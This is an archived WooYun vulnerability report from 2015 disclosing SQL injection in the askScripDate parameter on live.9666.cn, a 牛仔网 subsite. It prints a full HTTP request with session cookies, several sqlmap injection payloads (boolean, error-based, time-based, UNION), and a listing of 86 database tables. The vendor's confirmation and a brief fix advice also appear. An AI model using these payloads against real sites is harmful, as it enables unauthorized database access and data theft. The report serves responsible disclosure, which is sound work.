当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143438

漏洞标题:牛仔网某分站SQL注射(可union)

相关厂商:牛仔网

漏洞作者: missy

提交时间:2015-09-25 17:40

修复时间:2015-11-09 19:50

公开时间:2015-11-09 19:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-25: 细节已通知厂商并且等待厂商处理中
2015-09-25: 厂商已经确认,细节仅向厂商公开
2015-10-05: 细节向核心白帽子及相关领域专家公开
2015-10-15: 细节向普通白帽子公开
2015-10-25: 细节向实习白帽子公开
2015-11-09: 细节向公众公开

简要描述:

详细说明:

GET /scrip/findMyScrips.action?roomsInfo=&askScripDate=2015-07-20'' HTTP/1.1
Host: live.9666.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://live.9666.cn/scrip/myScrips?toolbar
Cookie: cowboy_website=c226bc22-af26-4e88-a886-80d132782618; musicStatus=on; __utma=236883550.934637685.1443167390.1443167390.1443167390.1; __utmb=236883550.11.10.1443167390; __utmc=236883550; __utmz=236883550.1443167390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; cowboy_temp=""; cowboy_login=C3A25A22C3B450C3812A36C38EC3A6C2BDC29BC39E4C7A69C2896A1E; cowboy_user_name=asdfg; cowboy_login_imply=C3A25A22C3B450C3812A36C38EC3A6C2BDC29BC39E4C7A69C2896A1E; cowboy_nick_name=61736466675f34354c4f4e43; cowboy_latest_login_time=1443168569; haoshengyin=1; JSESSIONID=D80ECF2572888245CD6E573022B67F0D
Connection: keep-alive


参数:askScripDate


1.jpg


2.jpg


3.jpg


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: askScripDate (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: roomsInfo=&askScripDate=-5945' OR 6307=6307#
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: roomsInfo=&askScripDate=-4368' OR 1 GROUP BY CONCAT(0x7162787a71,(SELECT (CASE WHEN (1877=1877) THEN 1 ELSE 0 END)),0x71626a7171,FLOOR(RAND(0)*2)) HAVING MIN(0)#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (comment)
Payload: roomsInfo=&askScripDate=2015-07-20''' OR SLEEP(5)#
Type: UNION query
Title: MySQL UNION query (NULL) - 1 column
Payload: roomsInfo=&askScripDate=2015-07-20''' UNION ALL SELECT CONCAT(0x7162787a71,0x6e4c4e70697444767670,0x71626a7171)#
---
web application technology: JSP
back-end DBMS: MySQL 5.0.12
Database: live
[86 tables]
+-------------------------------------------+
| t_liv_ad_convertion_percent |
| t_liv_ad_record |
| t_liv_admin_statistics |
| t_liv_apply |
| t_liv_bulletin |
| t_liv_buy_vip_detail |
| t_liv_certificate |
| t_liv_certificate_account |
| t_liv_chat |
| t_liv_chat_examination_permission |
| t_liv_chat_examination_recording |
| t_liv_check_in |
| t_liv_common_view |
| t_liv_common_view_order |
| t_liv_data_bank |
| t_liv_data_bank_active |
| t_liv_data_bank_addition |
| t_liv_data_bank_addition_audit_record |
| t_liv_data_bank_audit_history |
| t_liv_data_bank_category |
| t_liv_data_bank_leavemessage |
| t_liv_data_bank_leavemessage_count |
| t_liv_data_bank_master |
| t_liv_data_bank_question |
| t_liv_data_bank_replymessage |
| t_liv_data_bank_replymessage_audit_record |
| t_liv_data_bank_user_see |
| t_liv_data_detail |
| t_liv_data_detail_log |
| t_liv_date_bank_remark |
| t_liv_forbid |
| t_liv_gift |
| t_liv_ip_statistics |
| t_liv_liver_advertisement |
| t_liv_liver_advertisement_ectype |
| t_liv_liver_introduce |
| t_liv_liver_introduce_ectype |
| t_liv_message |
| t_liv_message_notice |
| t_liv_message_recommend |
| t_liv_mobile_feedback |
| t_liv_notice |
| t_liv_privilege |
| t_liv_recommend_column |
| t_liv_recommend_liver |
| t_liv_recommend_message |
| t_liv_recommend_script |
| t_liv_record |
| t_liv_relevance_website |
| t_liv_room |
| t_liv_room_certificate |
| t_liv_room_property |
| t_liv_room_relevance |
| t_liv_score_detail |
| t_liv_scrip_answer |
| t_liv_scrip_ask |
| t_liv_scrip_ask_first_record |
| t_liv_scrip_recommend |
| t_liv_statistic_chat_scrip_total |
| t_liv_statistic_chat_scrip_total_rank |
| t_liv_statistic_chat_total |
| t_liv_statistic_chat_user_room |
| t_liv_statistic_chat_user_room_rank |
| t_liv_statistic_room_available |
| t_liv_statistic_scrip_total |
| t_liv_statistic_scrip_user_room |
| t_liv_statistic_scrip_user_room_rank |
| t_liv_statistics |
| t_liv_support_num |
| t_liv_tag |
| t_liv_tag_chat |
| t_liv_tag_message |
| t_liv_tag_view |
| t_liv_title |
| t_liv_title_level |
| t_liv_training_camp |
| t_liv_user |
| t_liv_view |
| t_liv_vipinfo |
| t_liv_vote_detail |
| t_live_room_property_log |
| t_live_statics_month |
| t_live_weibo_account |
| v_hall_record |
| v_hall_record_hits |
| v_hall_room |
+-------------------------------------------+

漏洞证明:

修复方案:

参数过滤

版权声明:转载请注明来源 missy@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-09-25 19:48

厂商回复:

感谢提交

最新状态:

暂无